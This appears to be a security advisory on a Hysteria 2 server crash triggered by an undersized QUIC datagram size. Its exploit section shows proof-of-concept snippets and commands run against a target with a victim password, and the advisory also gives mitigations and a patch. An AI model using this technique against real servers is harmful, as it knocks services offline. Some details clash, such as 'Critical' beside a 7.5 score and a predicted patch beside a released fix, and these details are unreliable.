This vulnerability resides in the Hysteria 2 server’s UDP response fragmentation logic, specifically within the `core/internal/frag/frag.go` module. The flaw is triggered when an authenticated client advertises an artificially small QUIC `max_datagram_frame_size` transport parameter during connection establishment.
The attack flow proceeds as follows: The attacker authenticates to the Hysteria server using a valid password, then sends a UDP message to a target reachable from the server. The server, following normal operation, attempts to relay the UDP response back to the client via a QUIC DATAGRAM frame. However, because the client advertised a very small `max_datagram_frame_size` (e.g., 20 bytes), the QUIC library (quic-go) correctly rejects the DATAGRAM send attempt and returns a DatagramTooLargeError.
The server’s error handling logic then invokes the `FragUDPMessage` function to fragment the response into smaller pieces. The critical flaw is that `FragUDPMessage` assumes the `maxSize` parameter (derived from the client’s advertised `max_datagram_frame_size`) will always be larger than the UDP message header size. When the attacker chooses a value smaller than the header size, the calculation `maxPayloadSize := maxSize - m.HeaderSize()` produces a zero or negative value.
This value is subsequently used as the slice bound in a slicing operation, triggering a Go runtime panic with “slice bounds out of range” and terminating the entire server process. The vulnerability is particularly severe because it requires only valid authentication credentials and does not depend on any optional server features being enabled, unlike the related sniffing OOM vulnerability (GHSA-9fw6-xgg2-mq9q).
The proof-of-concept code demonstrates this by setting `--max-datagram=20` and sending a trigger message that forces the server to attempt a UDP response. The server crashes with a slice bounds panic in the fragmentation code, as the header size of the UDP message (which includes the address length encoding) exceeds the advertised maximum datagram size.
DailyCVE Form
Platform: Hysteria 2
Version: v2.4.5 through v2.8.1
Vulnerability: Datagram fragmentation slice bounds panic
Severity: Critical (DoS: Server Crash)
Date: 2026-05-05 (disclosed)
Prediction: 2026-06-15 (expected patch)
What Undercode Say: Analytics
The vulnerability manifests in the following code path:
```go
// Vulnerable code in core/internal/frag/frag.go
// The function assumes maxSize > m.HeaderSize()
maxPayloadSize := maxSize - m.HeaderSize() // becomes zero/negative
// Later slicing operation panics:
payload := msg.Data[:maxPayloadSize]
// panic: slice bounds out of range
```
Trigger conditions:
- Client advertises `max_datagram_frame_size` < UDP message header size
- Server receives a UDP response that requires fragmentation
- Header size formula: `8 + quicvarint.Len(len(addr)) + len(addr)`
Example header size calculation:
For target "127.0.0.1:19090" (length 15):
HeaderSize = 8 + quicvarint.Len(15) + 15 = 8 + 1 + 15 = 24 bytes
With --max-datagram=20, maxPayloadSize = 20 - 24 = -4 → panic
Affected component: `core/server/udp.go` → `sendMessageAutoFrag` → `FragUDPMessage`
Call stack:
receiveLoop() → sendMessageAutoFrag() → conn.SendDatagram() → DatagramTooLargeError → FragUDPMessage() → panic
PoC execution:
```shell
# Start vulnerable server
./hysteria server -c config.yaml
# Run the PoC with small max-datagram
go run poc.go --server=127.0.0.1:8443 --auth=mypassword --max-datagram=20
```
Exploit
The attacker must first authenticate to the Hysteria server with valid credentials:
```go
// Authentication request
req.Header.Set("Hysteria-Auth", auth)
req.Header.Set("Hysteria-CC-RX", "0")
// Server responds with HTTP 233 on success
```
After authentication, the attacker sends a UDP message that will trigger a response:
```go
// Build Hysteria UDP message
msg := hysteriaUDPMessage(1, target, []byte("X"))
// Send via QUIC datagram
conn.SendDatagram(msg)
```
The server attempts to respond, but the fragmentation logic panics:
```
panic: runtime error: slice bounds out of range [:-4]
goroutine 123 [bash]:
github.com/apernet/hysteria/core/internal/frag.FragUDPMessage(...)
/core/internal/frag/frag.go:45
```
Full PoC compilation:
```shell
# Build the exploit
go build -o poc poc.go
# Execute against target
./poc --server=192.168.1.100:8443 --auth=victim_password --max-datagram=20
```
The server crashes immediately upon receiving the response, with no additional privileges required beyond valid authentication.
Protection
Immediate mitigations:
1. Upgrade Hysteria to version v2.8.2 or higher, which contains the fix for this vulnerability.
2. Apply the following patch to `core/internal/frag/frag.go`:
```go
func FragUDPMessage(m protocol.UDPMessage, maxSize int) ([][]byte, error) {
	// Add validation check
	if maxSize <= m.HeaderSize() {
		return nil, fmt.Errorf("maxSize %d is too small for header size %d",
			maxSize, m.HeaderSize())
	}
	// ... rest of function
}
```
3. Workaround: Configure the server to reject clients advertising `max_datagram_frame_size` below a safe threshold (e.g., 256 bytes) by implementing a custom QUIC transport parameter validation middleware.
4. Network-level protection: Deploy a reverse proxy or load balancer that can terminate QUIC connections and filter malformed transport parameters before they reach the Hysteria backend.
5. Monitoring: Implement crash detection and automatic restart procedures, though this is a temporary measure only.
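The header size formula from the analytics section and the guard from item 2, worked into one self-contained Go routine (an added example, not the Hysteria project's code): `UDPMessage` and `varintLen` are assumed stand-ins for `protocol.UDPMessage` and `quicvarint.Len`, and the function returns payload chunks only rather than fully encoded fragments.

```go
package main

import "fmt"

// varintLen mirrors quicvarint.Len: bytes needed to encode v as a QUIC varint.
func varintLen(v uint64) int {
	switch {
	case v <= 63:
		return 1
	case v <= 16383:
		return 2
	case v <= 1073741823:
		return 4
	}
	return 8
}

// UDPMessage is a minimal stand-in for protocol.UDPMessage (assumed shape, constructed here).
type UDPMessage struct {
	SessionID uint32
	Addr      string
	Data      []byte
}

// HeaderSize applies the advisory's formula: 8 + quicvarint.Len(len(addr)) + len(addr).
func (m UDPMessage) HeaderSize() int {
	return 8 + varintLen(uint64(len(m.Addr))) + len(m.Addr)
}

// FragUDPMessage returns the payload chunks that fit alongside the header in maxSize
// bytes. The guard is the fix: a maxSize that cannot hold the header plus one payload
// byte is rejected instead of reaching the slice with a zero or negative bound.
func FragUDPMessage(m UDPMessage, maxSize int) ([][]byte, error) {
	maxPayloadSize := maxSize - m.HeaderSize()
	if maxPayloadSize <= 0 {
		return nil, fmt.Errorf("maxSize %d is too small for header size %d", maxSize, m.HeaderSize())
	}
	var frags [][]byte
	for off := 0; off < len(m.Data); off += maxPayloadSize {
		end := off + maxPayloadSize
		if end > len(m.Data) {
			end = len(m.Data)
		}
		frags = append(frags, m.Data[off:end])
	}
	return frags, nil
}
```

With the advisory's target `127.0.0.1:19090` and `maxSize` 20 the call now returns an error instead of panicking; with a usable `maxSize` the payload is split into ceil(len/maxPayloadSize) chunks.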
Impact
Severity: Critical
CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)
Primary impact:
- Availability: Complete denial of service via server process termination
- Service disruption: All active connections are dropped; the server must be manually or automatically restarted
- Attack surface: Exploitable by any authenticated client, regardless of server configuration
Secondary impacts:
- Business continuity: Production environments experience extended downtime until the server is restored
- Reputational damage: Service interruptions can erode user trust in the VPN/proxy service
- Operational cost: Increased administrative overhead for monitoring and restarting crashed instances
Affected deployments:
- All Hysteria 2 servers running versions v2.4.5 through v2.8.1
- Both public and private deployments are vulnerable
- The vulnerability is independent of the `sniff` feature, unlike GHSA-9fw6-xgg2-mq9q
Exploit prerequisites:
- Valid authentication credentials (password or other auth method)
- Network accessibility to the Hysteria server
- Ability to establish a QUIC connection and advertise custom transport parameters
Sources:
Reported By: github.com